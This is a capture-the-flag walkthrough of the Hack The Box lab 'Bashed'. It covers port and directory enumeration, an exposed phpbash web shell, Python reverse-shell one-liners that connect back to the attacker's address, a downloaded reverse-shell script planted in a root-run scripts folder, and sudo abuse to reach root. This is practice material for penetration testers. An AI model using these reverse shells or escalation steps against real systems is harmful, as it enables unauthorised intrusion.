HTB – Bashed

Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

C:\Users\jacco>nmap -sC -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

Next, we use wfuzz to enumerate the directories and found some important directories such as /dev

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000018: C=404 9 L 32 W 279 Ch "2006"
000019: C=404 9 L 32 W 279 Ch "news"
000013: C=200 161 L 397 W 7745 Ch "#"
000014: C=200 161 L 397 W 7745 Ch ""
000015: C=404 9 L 32 W 280 Ch "index"
000016: C=301 9 L 28 W 311 Ch "images"
000017: C=404 9 L 32 W 283 Ch "download"
000020: C=404 9 L 32 W 280 Ch "crack"
000021: C=404 9 L 32 W 281 Ch "serial"
000022: C=404 9 L 32 W 280 Ch "warez"
000023: C=404 9 L 32 W 279 Ch "full"
000030: C=404 9 L 32 W 277 Ch "11"
Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000013: C=200 161 L 397 W 7745 Ch "#"
000016: C=301 9 L 28 W 311 Ch "images"
000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts"
000014: C=200 161 L 397 W 7745 Ch ""
000164: C=301 9 L 28 W 312 Ch "uploads"
000338: C=301 9 L 28 W 308 Ch "php"
000550: C=301 9 L 28 W 308 Ch "css"
000834: C=301 9 L 28 W 308 Ch "dev"
000953: C=301 9 L 28 W 307 Ch "js"
002771: C=301 9 L 28 W 310 Ch "fonts"
044769: C=
Finishing pending requests...

So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.

It will redirect to the following page as shown below, which seems like a shell interacting through the browser.

After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check the present list in the current directory.

we execute the following command in phpbash

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'

puckshell.py 100%[===================>] 213 --.-KB/s in 0s

2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]
scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  3 09:43 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  213 Apr  3 09:43 puckshell.py
-rw-r--r--  1 scriptmanager scriptmanager    0 Apr  2 08:50 test.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Apr  2 08:50 test.py.bak
-rw-r--r--  1 root          root            12 Apr  2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);scriptmanager@bashed:/scripts$

catch it
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cc4*****8e2
#

Author: Jacco Straathof

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *